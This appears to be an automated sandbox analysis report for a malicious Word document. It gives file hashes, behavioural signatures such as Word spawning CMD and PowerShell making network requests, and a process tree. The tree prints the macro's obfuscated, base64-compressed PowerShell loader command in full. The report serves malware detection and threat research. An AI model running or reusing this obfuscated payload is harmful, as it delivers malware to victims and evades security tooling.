Analysis
-
max time kernel
47s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 01:25
Behavioral task
behavioral1
Sample
a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9.doc
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9.doc
Resource
win10v2004-20241007-en
General
-
Target
a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9.doc
-
Size
66KB
-
MD5
442fa824fda4f1a62061dbf85af3fc23
-
SHA1
7178263616de595882740389d175aa9c155c17c4
-
SHA256
a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9
-
SHA512
1dc52ea851db31b703ef1777eb90df87d802bab3b21b2c717aa2a953ed3b378d4ae13932e28e7c0e9707ec9b32d83786f4963e20a517d448606b98a2f59cd3f2
-
SSDEEP
768:0VucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBs3ylZUbu11qrOhdr:0ocn1kp59gxBK85fBYyUzOh
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1476 3996 CMD.exe WINWORD.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 23 636 powershell.exe 26 636 powershell.exe 29 636 powershell.exe 30 636 powershell.exe 33 636 powershell.exe 35 636 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3996 WINWORD.EXE 3996 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 636 powershell.exe 636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 636 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3996 WINWORD.EXE 3996 WINWORD.EXE 3996 WINWORD.EXE 3996 WINWORD.EXE 3996 WINWORD.EXE 3996 WINWORD.EXE 3996 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECMD.exedescription pid process target process PID 3996 wrote to memory of 1476 3996 WINWORD.EXE CMD.exe PID 3996 wrote to memory of 1476 3996 WINWORD.EXE CMD.exe PID 1476 wrote to memory of 636 1476 CMD.exe powershell.exe PID 1476 wrote to memory of 636 1476 CMD.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SYSTEM32\CMD.exeCMD cMd.ExE /C "SeT mPQT=. ( $psHome[4]+$PShomE[30]+'X') (NEw-ObjEcT Io.cOMpRESsION.DefLAtesTREAm([SYstem.Io.mEMorYstREAm] [SYStEM.cOnvErT]::FRoMbASE64sTriNG('NZDRTgIxEEV/ZR+alA3SxicNzSYkiBskggYTNfGllMGtdDt1W7Yi2X+3S+T1nsmZO0MWD2VhIY5w8wUqZEsI7BU2U6PBBkG+1aKgVQhuzLnRaCuswR99gJpVB/64fts5P/nnMUbm0RzRMoU1kw2XzxfWKmx8UifAoxsptCH5+cEZlFvPn1pXXkY/vTRJIYG790u2xVpbPO806ne6mpWUrZ3RYUAnNBdkXb5kRUZvbq+pIFGvCgK2HaeWbkg/6LDnQ8rgB6jYYQNSVQOynMVM26w/MT+F5ngi6RXsDqPtO91rA+eZq6wX5mJuW9zDaJ6k50RskmcvOiWDqk5d9wc='), [systeM.Io.COMpResSiOn.coMPREsSiOnMoDE]::dECoMPrEss) ^| fOrEaCH-oBJEcT{NEw-ObjEcT SyStEm.io.StrEAmReAdER( $_ , [TExt.EncODing]::AsciI )} ).ReaDtOeNd( ) && PoWerSHelL Set-item ( 'va' +'RIablE:MY' + 'A' ) ([tYPe]( \"{0}{2}{3}{1}\" -F'E','eNt','n','viRONM' ) ) ; ( $MYa::( \"{0}{1}{3}{5}{2}{6}{4}\"-f 'GETENv','Ir','Ent','On','RIaBLe','m','vA' ).Invoke( ( \"{1}{0}\"-f 'qt','Mp' ),(\"{0}{2}{1}\" -f'pR','s','OCES' ) )) ^| ^& ( ( ^&( \"{1}{2}{0}\"-f 'le','v','ARiab') ( \"{0}{1}\" -f '*mdR','*' )).\"N`AMe\"[3,11,2]-join'' )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerSHelL Set-item ( 'va' +'RIablE:MY' + 'A' ) ([tYPe]( \"{0}{2}{3}{1}\" -F'E','eNt','n','viRONM' ) ) ; ( $MYa::( \"{0}{1}{3}{5}{2}{6}{4}\"-f 'GETENv','Ir','Ent','On','RIaBLe','m','vA' ).Invoke( ( \"{1}{0}\"-f 'qt','Mp' ),(\"{0}{2}{1}\" -f'pR','s','OCES' ) )) | & ( ( &( \"{1}{2}{0}\"-f 'le','v','ARiab') ( \"{0}{1}\" -f '*mdR','*' )).\"N`AMe\"[3,11,2]-join'' )3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
45KB
MD5adc8c48a803eb871090c74ef28d0edb5
SHA1c033b5766561f389543279ee1d3193ad2a05c544
SHA2565ea545999380810c63f3a2e643cb2cc09671e42e089007750982c301e5e2a486
SHA512d9f11074763cd6d78194f63476ea3513f58c10745fa63d9533e68941743ebd2203033e438349f48aff91ac18c11988592fd936854f4f0c472d6885125bb68675
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl
Filesize262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84